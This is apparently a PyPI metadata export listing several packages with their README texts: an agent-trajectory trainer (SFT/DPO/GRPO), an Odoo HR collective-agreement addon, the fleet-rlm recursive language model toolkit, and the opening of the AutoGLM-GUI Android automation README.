| text/markdown | null | Victor Brabant <victorbrabant@gmail.com> | null | null | MIT | lago, networks, temporal networks, modularity | [] | [] | null | null | >=3.11 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/fondationsahar/dynamic_community_detection",
"Issues, https://github.com/fondationsahar/dynamic_community_detection/issues"
] | twine/6.1.0 CPython/3.11.11 | 2026-02-20T09:16:24.713292 | dcd_lago-1.0.4.tar.gz | 21,195 | 1b/57/8d1e10589a8c3fb6804eae5f5a45c808c137d615daae77c46278393a5dc7/dcd_lago-1.0.4.tar.gz | source | sdist | null | false | 7af13b0da6f7627a1822f5e49da11c5c | 79aae949a54d1a154085cfcdec9904335571b64c5db80453788a91cd1cefc950 | 1b578d1e10589a8c3fb6804eae5f5a45c808c137d615daae77c46278393a5dc7 | null | [
"LICENSE.txt"
] | 214 |
2.4 | knowlyr-trainer | 0.1.1 | PyTorch-based trainer for Agent trajectory datasets — SFT, DPO, GRPO | # knowlyr-trainer
纯 PyTorch Agent 轨迹训练工具 — SFT / DPO / GRPO,无缝对接 `knowlyr-hub` 导出的数据集。
**Agent 训练增强**: 多轮对话格式、观察 token 遮蔽、步骤级 reward 加权、长轨迹分块、课程学习。
## 安装
```bash
pip install knowlyr-trainer
# 可选
pip install knowlyr-trainer[peft] # LoRA 微调
pip install knowlyr-trainer[wandb] # wandb 日志
pip install knowlyr-trainer[all] # 全部
```
## 快速开始
### CLI
```bash
# SFT 训练
knowlyr-trainer sft --train-file sft.jsonl --model Qwen/Qwen2.5-Coder-7B
# DPO 偏好学习
knowlyr-trainer dpo --train-file dpo.jsonl --model ./output/sft/final --beta 0.1
# GRPO 组内相对策略优化
knowlyr-trainer grpo --train-file grpo.jsonl --model ./output/sft/final
# 模型评估
knowlyr-trainer eval --model ./output/sft/final --eval-file eval.jsonl
```
### YAML 配置
```bash
knowlyr-trainer sft --config train_config.yaml
```
```yaml
# train_config.yaml
model_name_or_path: Qwen/Qwen2.5-Coder-7B
train_file: sft_data.jsonl
output_dir: ./output/sft
num_epochs: 3
batch_size: 4
learning_rate: 2e-5
max_length: 4096
bf16: true
use_lora: true
agent_format: true # 启用 Agent 多轮格式
mask_observations: true # 遮蔽观察 token
step_weighted_loss: true # 步骤级 reward 加权
curriculum: true # 课程学习
```
### Python API
```python
from agenttrainer import SFTConfig
from agenttrainer.trainers.sft import SFTTrainer
config = SFTConfig(
model_name_or_path="Qwen/Qwen2.5-Coder-7B",
train_file="sft_data.jsonl",
output_dir="./output",
agent_format=True,
mask_observations=True,
)
trainer = SFTTrainer(config)
trainer.train()
```
## 数据格式
无缝对接 `knowlyr-hub export` 导出的 JSONL:
```bash
knowlyr-hub export --format sft -t trajectories.jsonl -o sft_train.jsonl
knowlyr-hub export --format dpo -t trajectories.jsonl -p preferences.jsonl -o dpo_train.jsonl
knowlyr-hub export --format grpo -t trajectories.jsonl -o grpo_train.jsonl
```
### Agent 增强数据格式
启用 `agent_format=True` 时,支持结构化步骤数据:
```json
{
"instruction": "Fix the off-by-one bug in sort function",
"input": "{\"repo\": \"owner/repo\"}",
"steps": [
{"thought": "Read the file", "action": "read_file /sort.py", "observation": "def sort(arr): ...", "reward": 0.7},
{"thought": "Fix the bug", "action": "edit_file /sort.py", "observation": "File edited", "reward": 0.9}
],
"task_id": "task-001",
"reward": 0.85
}
```
也兼容平文本 `response` 字段(自动解析 `Step N: / Thought: / Action: / Observation:` 格式)。
## Agent 训练增强
标准 SFT/DPO/GRPO 之外,针对 Agent 长程任务的 6 项增强:
### 1. 多轮对话格式 (`agent_format`)
将轨迹从平文本转为结构化多轮对话:
```
user: Fix the bug in sort.py ← 任务描述(不参与 loss)
assistant: Thought: Read the file ← 模型输出(参与 loss ✓)
Action: read_file /sort.py
user: Observation: def sort(arr)... ← 环境反馈(不参与 loss)
assistant: Thought: Fix the comparison ← 模型输出(参与 loss ✓)
Action: edit_file /sort.py
user: Observation: File edited ← 环境反馈(不参与 loss)
```
### 2. 观察遮蔽 (`mask_observations`)
只对模型生成的 thought + action token 计算 loss,环境返回的 observation token 设为 `labels=-100`。避免模型学习「预测环境行为」,专注于「学习决策」。
### 3. 步骤级 reward 加权 (`step_weighted_loss`)
使用 `knowlyr-reward` 的步骤级 process reward 加权每个 token 的 CE loss:
```
loss_token = CE(token) × (step_reward / mean_reward)
```
好的步骤获得更高权重,差的步骤被降权。
### 4. 长轨迹分块 (`chunk_long_trajectories`)
超过 `max_length` 的轨迹按步骤边界拆分为多个训练样本。每个 chunk 包含任务描述 + 上下文步骤 + 当前段,不在步骤中间断开。
### 5. 课程学习 (`curriculum`)
从简单(短轨迹/高 reward)到困难(长轨迹/低 reward)渐进式训练:
```yaml
curriculum: true
curriculum_start_ratio: 0.3 # 初始使用 30% 最简单样本
curriculum_warmup_epochs: 2 # 2 个 epoch 后使用全部数据
```
### 6. 步骤级 GRPO (`step_level_advantage`)
在 GRPO 的轨迹级 advantage 基础上,用步骤 reward 进一步加权:
```
A_{i,j} = A_trajectory_i × (r_{step_j} / mean(r_steps))
```
好的轨迹中的好步骤获得更大正梯度,差的轨迹中的差步骤受到更大惩罚。
## 训练方法
| 方法 | 用途 | 数据格式 | CLI |
|------|------|---------|-----|
| **SFT** | 监督微调 | instruction/response JSONL | `knowlyr-trainer sft` |
| **DPO** | 偏好对齐 | prompt/chosen/rejected JSONL | `knowlyr-trainer dpo` |
| **GRPO** | 组内策略优化 | prompt + 多条轨迹 JSONL | `knowlyr-trainer grpo` |
## 功能矩阵
| 功能 | SFT | DPO | GRPO |
|------|-----|-----|------|
| 多轮对话格式 | ✅ | — | — |
| 观察遮蔽 | ✅ | — | — |
| 步骤加权 loss | ✅ | — | — |
| 长轨迹分块 | ✅ | — | — |
| 课程学习 | ✅ | — | — |
| 步骤级 advantage | — | — | ✅ |
| LoRA | ✅ | ✅ | ✅ |
| bf16 混合精度 | ✅ | ✅ | ✅ |
| Checkpoint 保存 | ✅ | ✅ | ✅ |
| wandb 日志 | ✅ | ✅ | ✅ |
## License
MIT
| text/markdown | null | Liu Kai <mrliukai@gmail.com> | null | null | null | agent-training, code-agent, dpo, grpo, pytorch, reinforcement-learning, sft, trajectory | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"accelerate>=0.25",
"click>=8.0",
"pydantic>=2.0",
"pyyaml>=6.0",
"torch>=2.0",
"tqdm>=4.65",
"transformers>=4.36",
"mcp>=1.0; extra == \"all\"",
"peft>=0.7; extra == \"all\"",
"pytest; extra == \"all\"",
"ruff; extra == \"all\"",
"wandb>=0.16; extra == \"all\"",
"pytest; extra == \"dev\"",
"ruff; extra == \"dev\"",
"mcp>=1.0; extra == \"mcp\"",
"peft>=0.7; extra == \"peft\"",
"wandb>=0.16; extra == \"wandb\""
] | [] | [] | [] | [
"Homepage, https://github.com/liuxiaotong/knowlyr-agent",
"Documentation, https://github.com/liuxiaotong/knowlyr-agent/tree/main/packages/trainer",
"Repository, https://github.com/liuxiaotong/knowlyr-agent",
"Issues, https://github.com/liuxiaotong/knowlyr-agent/issues"
] | twine/6.2.0 CPython/3.13.11 | 2026-02-20T09:15:33.933943 | knowlyr_trainer-0.1.1.tar.gz | 52,593 | 76/85/8f6d672cb86ccc3956ec1c5cefab2816bf586189050ef1a10febaf1de3c2/knowlyr_trainer-0.1.1.tar.gz | source | sdist | null | false | 6571a68d05d563aef80dcea59ae1422a | 89c42cda444995ad0291312269f866fff8aaacb82f137a0836e8c081e7fecc76 | 76858f6d672cb86ccc3956ec1c5cefab2816bf586189050ef1a10febaf1de3c2 | MIT | [] | 209 |
2.1 | odoo-addon-hr-collective-agreement | 18.0.1.0.0.2 | Create and manage collective agreements | .. image:: https://odoo-community.org/readme-banner-image
:target: https://odoo-community.org/get-involved?utm_source=readme
:alt: Odoo Community Association
=======================
Hr Collective Agreement
=======================
..
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! This file is generated by oca-gen-addon-readme !!
!! changes will be overwritten. !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! source digest: sha256:80fbc67fee72445c7114ed82b0a7a12a681a587a63f74eb77ba04f522ac6004c
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
.. |badge1| image:: https://img.shields.io/badge/maturity-Beta-yellow.png
:target: https://odoo-community.org/page/development-status
:alt: Beta
.. |badge2| image:: https://img.shields.io/badge/license-LGPL--3-blue.png
:target: http://www.gnu.org/licenses/lgpl-3.0-standalone.html
:alt: License: LGPL-3
.. |badge3| image:: https://img.shields.io/badge/github-OCA%2Fhr-lightgray.png?logo=github
:target: https://github.com/OCA/hr/tree/18.0/hr_collective_agreement
:alt: OCA/hr
.. |badge4| image:: https://img.shields.io/badge/weblate-Translate%20me-F47D42.png
:target: https://translation.odoo-community.org/projects/hr-18-0/hr-18-0-hr_collective_agreement
:alt: Translate me on Weblate
.. |badge5| image:: https://img.shields.io/badge/runboat-Try%20me-875A7B.png
:target: https://runboat.odoo-community.org/builds?repo=OCA/hr&target_branch=18.0
:alt: Try me on Runboat
|badge1| |badge2| |badge3| |badge4| |badge5|
This module provides a core model to manage collective wage agreements
in a multi-company environment. It allows defining and maintaining
collective agreements with information such as code, name, scope,
publication dates, official publications, state and observations.
**Table of contents**
.. contents::
:local:
Installation
============
To install this module, you need to:
- Only install
Usage
=====
Collective agreements are managed from:
**Human Resources → Configuration → Collective Agreements**
From this menu, HR Administrators can create, review and maintain
collective agreements.
Two auxiliary configuration models are available under the same menu:
- **Scopes**: Define the scope of application of a collective agreement.
- **Official Publications**: Define the official publication source of
the agreement.
Collective agreements can be manually activated, finished or cancelled
according to their lifecycle.
These state transitions are available from the agreement form view.
Additionally, multiple agreements can be selected from the list view and
processed simultaneously using the action menu.
From this action menu, users can:
- Cancel agreements that are in Draft or Active state.
- Finish agreements that are in Active state only
This module also provides a global action **“Update agreement states”**.
This action reviews all agreements in *Draft* and *Active* states and
updates their state automatically based on their validity dates.
Bug Tracker
===========
Bugs are tracked on `GitHub Issues <https://github.com/OCA/hr/issues>`_.
In case of trouble, please check there if your issue has already been reported.
If you spotted it first, help us to smash it by providing a detailed and welcomed
`feedback <https://github.com/OCA/hr/issues/new?body=module:%20hr_collective_agreement%0Aversion:%2018.0%0A%0A**Steps%20to%20reproduce**%0A-%20...%0A%0A**Current%20behavior**%0A%0A**Expected%20behavior**>`_.
Do not contact contributors directly about support or help with technical issues.
Credits
=======
Authors
-------
* Sygel
Contributors
------------
- `Sygel <https://www.sygel.es>`__:
- Ángel Rivas
- Valentín Vinagre
Maintainers
-----------
This module is maintained by the OCA.
.. image:: https://odoo-community.org/logo.png
:alt: Odoo Community Association
:target: https://odoo-community.org
OCA, or the Odoo Community Association, is a nonprofit organization whose
mission is to support the collaborative development of Odoo features and
promote its widespread use.
This module is part of the `OCA/hr <https://github.com/OCA/hr/tree/18.0/hr_collective_agreement>`_ project on GitHub.
You are welcome to contribute. To learn how please visit https://odoo-community.org/page/Contribute.
| text/x-rst | Sygel, Odoo Community Association (OCA) | support@odoo-community.org | null | null | LGPL-3 | null | [
"Programming Language :: Python",
"Framework :: Odoo",
"Framework :: Odoo :: 18.0",
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)"
] | [] | https://github.com/OCA/hr | null | >=3.10 | [] | [] | [] | [
"odoo==18.0.*"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T09:15:12.661505 | odoo_addon_hr_collective_agreement-18.0.1.0.0.2-py3-none-any.whl | 35,968 | 4d/85/4f9cfe86b7cd3fb56053a2350777d803b352bc19c52d76cadc64e811a910/odoo_addon_hr_collective_agreement-18.0.1.0.0.2-py3-none-any.whl | py3 | bdist_wheel | null | false | aa8de46c2d6792e233a79e696c593d07 | e4e14b86efa29edf3e10bd0442703ccdfffaaedf7a83f925b13e4cc24f2273f7 | 4d854f9cfe86b7cd3fb56053a2350777d803b352bc19c52d76cadc64e811a910 | null | [] | 95 |
2.4 | fleet-rlm | 0.4.6 | Recursive Language Models with DSPy + Modal and an integrated Web UI for secure long-context code execution | # fleet-rlm
[](https://pypi.org/project/fleet-rlm/)
[](https://pypi.org/project/fleet-rlm/)
[](LICENSE)
[](https://github.com/Qredence/fleet-rlm/actions/workflows/ci.yml)
[](https://pepy.tech/projects/fleet-rlm)
**Secure, cloud-sandboxed Recursive Language Models (RLM) with DSPy and Modal.**
`fleet-rlm` provides a production-ready implementation of **Recursive Language Modeling** aligned with the [DSPy RLM API](https://dspy.ai/api/modules/RLM/). It gives your AI agent a secure "computer" in the cloud to read, search, and analyze massive datasets without local resource constraints.
[Paper](https://arxiv.org/abs/2501.123) | [Contributing](CONTRIBUTING.md) | [Docs](docs/)
---
## Architecture
```mermaid
graph TB
subgraph entry ["🚪 Entry Points"]
CLI["CLI (Typer)"]
WebUI["Web UI<br/>(React SPA)"]
API["FastAPI<br/>(WS/REST)"]
TUI["Ink TUI<br/>(stdio bridge)"]
MCP["MCP Server"]
end
subgraph orchestration ["🧠 Orchestration Layer"]
Agent["RLMReActChatAgent<br/>(dspy.Module)"]
History["Chat History"]
Memory["Core Memory<br/>(Persona/Human/Scratchpad)"]
DocCache["Document Cache"]
end
subgraph tools ["🔧 ReAct Tools"]
DocTools["📄 load_document<br/>read_file_slice<br/>chunk_by_*"]
RecursiveTools["🔄 rlm_query<br/>llm_query<br/>(recursive delegation)"]
ExecTools["⚡ execute_code<br/>edit_file<br/>search_code"]
end
subgraph execution ["⚙️ Execution Layer"]
Interpreter["ModalInterpreter<br/>(JSON protocol)"]
Profiles["Execution Profiles:<br/>ROOT | DELEGATE | MAINTENANCE"]
end
subgraph cloud ["☁️ Modal Cloud"]
Sandbox["Sandbox Driver<br/>(Python REPL)"]
Volume[("💾 Persistent Volume<br/>/data/<br/>• workspaces<br/>• artifacts<br/>• memory<br/>• session state")]
end
WebUI -->|"REST / WS"| API
CLI --> Agent
API --> Agent
TUI --> Agent
MCP --> Agent
Agent --> History
Agent --> Memory
Agent --> DocCache
Agent --> DocTools
Agent --> RecursiveTools
Agent --> ExecTools
DocTools --> Interpreter
RecursiveTools --> Interpreter
ExecTools --> Interpreter
Interpreter --> Profiles
Interpreter -->|"stdin/stdout<br/>JSON commands"| Sandbox
Sandbox -->|"read/write"| Volume
style entry fill:#e3f2fd,stroke:#1976d2,stroke-width:2px
style orchestration fill:#f3e5f5,stroke:#7b1fa2,stroke-width:2px
style tools fill:#fff3e0,stroke:#f57c00,stroke-width:2px
style execution fill:#e8f5e9,stroke:#388e3c,stroke-width:2px
style cloud fill:#fce4ec,stroke:#c2185b,stroke-width:2px
```
**Layers:**
🚪 **Entry Points** → 🧠 **Orchestration** → 🔧 **Tools** → ⚙️ **Execution** → ☁️ **Modal Cloud**
## Features
- **Web UI First (0.4.6)**: Integrated React SPA (`src/frontend`) is now the primary interactive surface for chat, execution timeline, and artifact workflows.
- **Interactive Agent**: `RLMReActChatAgent` (a `dspy.Module`) combines fast, interactive chat with deep, recursive task execution via `rlm_query`.
- **DSPy Aligned**: Implements `dspy.RLM`, `dspy.Module`, and `dspy.Tool` interfaces — compatible with DSPy optimizers (`BootstrapFewShot`, `MIPROv2`).
- **Secure Sandbox**: Code runs in isolated **Modal** containers with persistent storage volumes, execution profiles, and sensitive data redaction.
- **Recursive Delegation**: All delegate tools (`rlm_query`, `analyze_long_document`, `grounded_answer`, etc.) spawn true recursive sub-agents via `spawn_delegate_sub_agent()` with unified depth enforcement.
- **PDF Ingestion**: Native document loading via MarkItDown with pypdf fallback; OCR guidance for scanned PDFs.
- **Session State**: Per-workspace, per-user session persistence with manifests stored on Modal volumes.
- **MCP Server**: Expose fleet-rlm capabilities as an MCP tool server via `serve-mcp`.
- **Execution Streams**: `/ws/chat` remains the primary interactive stream while `/ws/execution` provides structured execution lifecycle events for Artifact Canvas and observability clients.
- **Observability**: Real-time streaming of thoughts, tool execution, trajectory normalization, and structured logging.
- **LLM Analytics (Opt-in)**: PostHog `$ai_generation` events for DSPy LM calls with trace correlation, token metadata, latency, and payload redaction/truncation.
## PostHog LLM Analytics
PostHog analytics is disabled by default. To enable it, set both:
```bash
POSTHOG_ENABLED=true
POSTHOG_API_KEY=phc_...
```
Optional settings:
- `POSTHOG_HOST` (default: `https://us.i.posthog.com`)
- `POSTHOG_DISTINCT_ID` (runtime user identity takes precedence in `/ws/chat`)
- `POSTHOG_FLUSH_INTERVAL` / `POSTHOG_FLUSH_AT`
- `POSTHOG_ENABLE_DSPY_OPTIMIZATION` (default: `false`)
- `POSTHOG_INPUT_TRUNCATION` / `POSTHOG_OUTPUT_TRUNCATION`
- `POSTHOG_REDACT_SENSITIVE` (default: `true`)
Programmatic setup:
```python
from fleet_rlm import configure_analytics
configure_analytics() # reads POSTHOG_* environment variables
```
Each DSPy LM call emits `$ai_generation` with:
- `$ai_trace_id`, `$ai_parent_trace_id`
- `$ai_model`, `$ai_provider`, `$ai_latency`
- `$ai_input`, `$ai_output_choices` (sanitized + truncated)
- `$ai_input_tokens`, `$ai_output_tokens`, `$ai_total_tokens`
## Quick Start
### 1. Install
```bash
uv pip install fleet-rlm
```
Optional extras for server and MCP support:
```bash
uv pip install fleet-rlm[server] # FastAPI server + WebSocket
uv pip install fleet-rlm[mcp] # MCP server
uv pip install fleet-rlm[full] # All extras
```
### 2. Configure
Set up your Modal and LLM credentials:
```bash
modal setup
modal volume create rlm-volume-dspy
modal secret create LITELLM DSPY_LM_MODEL=openai/gemini-3-pro-preview DSPY_LLM_API_KEY=sk-...
```
Set up NeonDB + backend auth bootstrap:
```bash
# from repo root
cp .env.example .env
# Edit .env and set:
# DATABASE_URL=postgresql://... (direct Neon endpoint)
# AUTH_MODE=dev
# AUTH_REQUIRED=false # dev default; auth optional until Entra is wired
# DEV_JWT_SECRET=...
```
Initialize DB schema:
```bash
# from repo root
uv run python scripts/db_init.py
```
### 3. Run
**Web UI (React SPA):**
`0.4.6` treats the React SPA as the primary interface. The backend serves the built frontend automatically.
```bash
# 1. Build the frontend (requires Bun)
cd src/frontend
bun install
bun run build
cd ../..
# 2. Build the Python package (bundles the UI into the wheel)
uv build
# 3. Install with server dependencies and run the Web UI server
uv pip install -e ".[server]"
uv run fleet web
```
Then navigate to `http://localhost:8000` in your browser.
OpenAPI source-of-truth is `openapi.yaml` at repository root. Frontend API types are generated from `src/frontend/openapi/fleet-rlm.openapi.yaml`, which should be synced from the root spec via frontend scripts.
**Interactive Chat (OpenTUI):**
```bash
# Requires OpenTUI / Bun
fleet-rlm code-chat --opentui
```
**Standalone Interactive Chat (Ink):**
```bash
# Ink runtime (supported standalone path)
fleet
# Force Ink explicitly
fleet --ui ink
```
**One-shot Tasks:**
```bash
# Basic question
fleet-rlm run-basic --question "What are the first 12 Fibonacci numbers?"
# Document analysis
fleet-rlm run-architecture --docs-path docs/architecture.md --query "Extract all components"
```
**Servers:**
```bash
# API server (FastAPI + WebSocket) via explicit command
uv run fleet-rlm serve-api --port 8000
# MCP server
fleet-rlm serve-mcp --transport stdio
```
WebSocket endpoints:
- `/api/v1/ws/chat` for interactive conversation and tool orchestration events.
- `/api/v1/ws/execution` for filtered execution lifecycle events (`execution_started`, `execution_step`, `execution_completed`) scoped by `workspace_id`, `user_id`, and `session_id`.
Issue a dev token:
```bash
# from repo root
uv run python scripts/dev_issue_token.py \
--tid "00000000-0000-0000-0000-000000000123" \
--oid "00000000-0000-0000-0000-000000000456" \
--email dev@example.com \
--name "Dev User"
```
Call an authenticated endpoint (debug headers):
```bash
curl -s http://127.0.0.1:8000/api/v1/auth/me \
-H "X-Debug-Tenant-Id: 00000000-0000-0000-0000-000000000123" \
-H "X-Debug-User-Id: 00000000-0000-0000-0000-000000000456" \
-H "X-Debug-Email: dev@example.com" \
-H "X-Debug-Name: Dev User"
```
Call an authenticated endpoint (JWT):
```bash
curl -s http://127.0.0.1:8000/api/v1/auth/me \
-H "Authorization: Bearer ${DEV_TOKEN}"
```
Run DB smoke test:
```bash
# from repo root
uv run python scripts/db_smoke.py
```
`fleet` and `fleet-rlm code-chat` serve different interactive paths:
- `fleet` = standalone bridge chat launcher (Ink runtime)
- `fleet-rlm code-chat` = OpenTUI runtime (OpenTUI/Bun required)
## Development Setup
```bash
# Clone and install
git clone https://github.com/qredence/fleet-rlm.git
cd fleet-rlm
uv sync --extra dev
# With server/MCP support
uv sync --extra dev --extra server --extra mcp
# Build React frontend bundle for web UI
cd src/frontend
bun install
bun run check
cd ../..
# Build Ink frontend bundle for `fleet --ui ink`
cd tui-cli/tui-ink
bun install
bun run build
bun run test
cd ..
# Copy environment template
cp .env.example .env
# Quality gate
uv run ruff check src tests
uv run ruff format --check src tests
uv run ty check src --exclude "src/fleet_rlm/_scaffold/**"
uv run pytest -q
# Auto-fix formatting when needed
uv run ruff format src tests
```
## Documentation
- [Concepts](docs/explanation/rlm-concepts.md) — Core architecture (Agent, RLM, Sandbox)
- [User Flows](docs/user_flows.md) — Interaction diagrams (Chat, Tools, Delegation)
- [Architecture](docs/explanation/architecture.md) — System components and hierarchy
- [Tutorials](docs/tutorials/index.md) — Step-by-step lessons
- [How-To Guides](docs/how-to-guides/index.md) — Installation, deployment, troubleshooting
- [CLI Reference](docs/reference/cli.md) — Full CLI command reference
- [HTTP API Reference](docs/reference/http-api.md) — Server endpoints and WebSocket protocol
- [Source Layout](docs/reference/source-layout.md) — Package structure guide
## Contributing
We welcome contributions! Please see our [Contribution Guide](CONTRIBUTING.md) and run the quality gate before submitting:
```bash
uv run ruff check src tests
uv run ruff format --check src tests
uv run ty check src --exclude "src/fleet_rlm/_scaffold/**"
uv run pytest -q
```
## License
MIT License — see [LICENSE](LICENSE).
Based on [Recursive Language Modeling](https://arxiv.org/abs/2501.123) research by **Alex L. Zhang** (MIT CSAIL), **Omar Khattab** (Stanford), and **Tim Kraska** (MIT).
| text/markdown | Qredence | null | null | null | null | dspy, llm, modal, recursive-language-model, rlm, agents | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Typing :: Typed"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"dspy==3.1.3",
"hydra-core<2,>=1.3",
"markitdown[all]<1,>=0.1.0",
"omegaconf<3,>=2.3",
"modal>=1.3.2",
"pypdf<7,>=6",
"pydantic<3,>=2.12.5",
"prompt-toolkit<4,>=3.0.50",
"python-dotenv>=1.2.1",
"pyyaml<7,>=6.0.3",
"rich<14,>=13.9",
"structlog<25,>=24.1.0",
"sqlmodel>=0.0.24",
"aiosqlite>=0.20.0",
"tomli>=2.0.0; python_version < \"3.11\"",
"typer<1,>=0.21.1",
"posthog>=7.9.1",
"asyncpg>=0.31.0",
"sqlalchemy>=2.0.46",
"greenlet>=3.3.1",
"psycopg>=3.3.2",
"pre-commit>=3.7; extra == \"dev\"",
"pytest>=8.2; extra == \"dev\"",
"pytest-asyncio>=0.24; extra == \"dev\"",
"ruff>=0.8; extra == \"dev\"",
"ty>=0.0.1a16; extra == \"dev\"",
"build>=1.2; extra == \"dev\"",
"twine>=5.1; extra == \"dev\"",
"fastmcp<3,>=2.14.0; extra == \"mcp\"",
"httpx[socks]<1,>=0.28.1; extra == \"mcp\"",
"pydantic<3,>=2.12.5; extra == \"mcp\"",
"alembic<2,>=1.13; extra == \"server\"",
"asyncpg<1,>=0.29; extra == \"server\"",
"fastapi[standard]<1,>=0.115; extra == \"server\"",
"greenlet<4,>=3.0; extra == \"server\"",
"psycopg[binary]<4,>=3.2; extra == \"server\"",
"PyJWT<3,>=2.8; extra == \"server\"",
"pydantic<3,>=2.12.5; extra == \"server\"",
"sqlalchemy<3,>=2; extra == \"server\"",
"scalar-fastapi<2,>=1.5.0; extra == \"server\"",
"uvicorn[standard]<1,>=0.32; extra == \"server\"",
"websockets<17,>=14; extra == \"server\"",
"alembic<2,>=1.13; extra == \"full\"",
"asyncpg<1,>=0.29; extra == \"full\"",
"fastmcp<3,>=2.14.0; extra == \"full\"",
"httpx[socks]<1,>=0.28.1; extra == \"full\"",
"pydantic<3,>=2.12.5; extra == \"full\"",
"psycopg[binary]<4,>=3.2; extra == \"full\"",
"PyJWT<3,>=2.8; extra == \"full\"",
"sqlalchemy<3,>=2; extra == \"full\"",
"greenlet<4,>=3.0; extra == \"full\"",
"fastapi[standard]<1,>=0.115; extra == \"full\"",
"uvicorn[standard]<1,>=0.32; extra == \"full\"",
"scalar-fastapi<2,>=1.5.0; extra == \"full\"",
"websockets<17,>=14; extra == \"full\""
] | [] | [] | [] | [
"Homepage, https://github.com/qredence/fleet-rlm",
"Repository, https://github.com/qredence/fleet-rlm",
"Issues, https://github.com/qredence/fleet-rlm/issues",
"Documentation, https://fleet-rlm.readthedocs.io/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:14:36.428247 | fleet_rlm-0.4.6.tar.gz | 254,928 | e0/e4/d18fdc07e731dd041e092efcedc9a8403829ce852507a165628194eed2f0/fleet_rlm-0.4.6.tar.gz | source | sdist | null | false | b731ad07f0c724b857c9d03adfb0ad0a | bfcb415871765e84bd0e167886e9cda6058816494fe783f8522544cee6f4d7e1 | e0e4d18fdc07e731dd041e092efcedc9a8403829ce852507a165628194eed2f0 | MIT | [
"LICENSE",
"AUTHORS.md"
] | 223 |
2.4 | autoglm-gui | 1.5.11 | Web GUI for AutoGLM Phone Agent - AI-powered Android automation | <div align="center">
<img src="https://github.com/user-attachments/assets/bbdaeb1c-b7f2-4a4b-a11a-34db4de0ba12" alt="autoglm-gui" width="150">
# AutoGLM-GUI
**AI 驱动的 Android 自动化生产力工具** - 支持定时任务、远程部署,让 AI 7x24 小时为你工作
从个人助手到自动化中枢:支持 **定时执行**、**Docker 部署**、**对话历史**,打造你的 AI 自动化助手


[](https://pypi.org/project/autoglm-gui/)
---
### 🎉 v1.5 重大更新:生产力工具升级
从个人助手到自动化中枢,AutoGLM-GUI 现已支持:
<table>
<tr>
<td width="20%" align="center">⏰<br/><b>定时任务</b><br/>Cron 调度系统</td>
<td width="20%" align="center">🐳<br/><b>Docker 部署</b><br/>7x24 运行</td>
<td width="20%" align="center">📚<br/><b>对话历史</b><br/>自动保存追溯</td>
<td width="20%" align="center">⚡<br/><b>立即打断</b><br/><1秒响应</td>
<td width="20%" align="center">📱<br/><b>多设备管理</b><br/>支持模拟器</td>
</tr>
</table>
**核心场景**:部署到服务器 + 定时任务 = AI 自动化助手 7x24 小时为你工作
📖 [查看完整更新日志](./RELEASE_NOTES_v1.4.1_to_v1.5.5.md) · [生产力场景示例](#-生产力场景示例)
---
<br/>
<a href="https://qm.qq.com/q/J5eAs9tn0W" target="__blank">
<strong>欢迎加入讨论交流群</strong>
</a>
[English Documentation](README_EN.md)
</div>
## ✨ 核心特性
### 🚀 生产力增强(v1.5 新增)
- **⏰ 定时任务调度** - Cron 风格的任务调度系统,自动执行重复操作(签到、检查、周期性任务)
- **📚 对话历史管理** - 自动保存所有对话记录,支持查看历史、追溯执行过程
- **⚡ 立即打断执行** - <1秒中断正在执行的任务,精准控制 AI 行为
- **🐳 Docker 一键部署** - 支持多架构(x64/ARM64),部署到服务器 7x24 小时运行
- **📱 模拟器零配置** - 自动检测本地 Android 模拟器,一键连接无需配对
### 🤖 AI 自动化能力
- **分层代理模式** - 🆕 决策模型 + 视觉模型双层协作架构,支持复杂任务规划与精准执行分离
- **完全无线配对** - 🆕 支持 Android 11+ 二维码扫码配对,无需数据线即可连接设备
- **多设备并发控制** - 同时管理和控制多个 Android 设备,设备间状态完全隔离
- **对话式任务管理** - 通过聊天界面控制 Android 设备
- **Workflow 工作流** - 🆕 预定义常用任务,一键快速执行,支持创建、编辑、删除和管理
### 💻 技术特性
- **实时屏幕预览** - 基于 scrcpy 的低延迟视频流,随时查看设备正在执行的操作
- **直接操控手机** - 在实时画面上直接点击、滑动操作,支持精准坐标转换和视觉反馈
- **零配置部署** - 支持任何 OpenAI 兼容的 LLM API
- **MCP 协议支持** - 🆕 内置 MCP 服务器,可集成到 Claude Desktop、Cursor 等 AI 应用中
- **ADB 深度集成** - 通过 Android Debug Bridge 直接控制设备(支持 USB 和 WiFi)
- **模块化界面** - 清晰的侧边栏 + 设备面板设计,功能分离明确
## 📥 快速下载
**一键下载桌面版(免配置环境):**
<div align="center">
| 操作系统 | 下载链接 | 说明 |
|---------|---------|------|
| 🪟 **Windows** (x64) | [📦 下载便携版 EXE](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/AutoGLM.GUI.1.5.5.exe) | 适用于 Windows 10/11,免安装 |
| 🍎 **macOS** (Apple Silicon) | [📦 下载 DMG](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/AutoGLM.GUI-1.5.5-arm64.dmg) | 适用于 M 芯片 Mac |
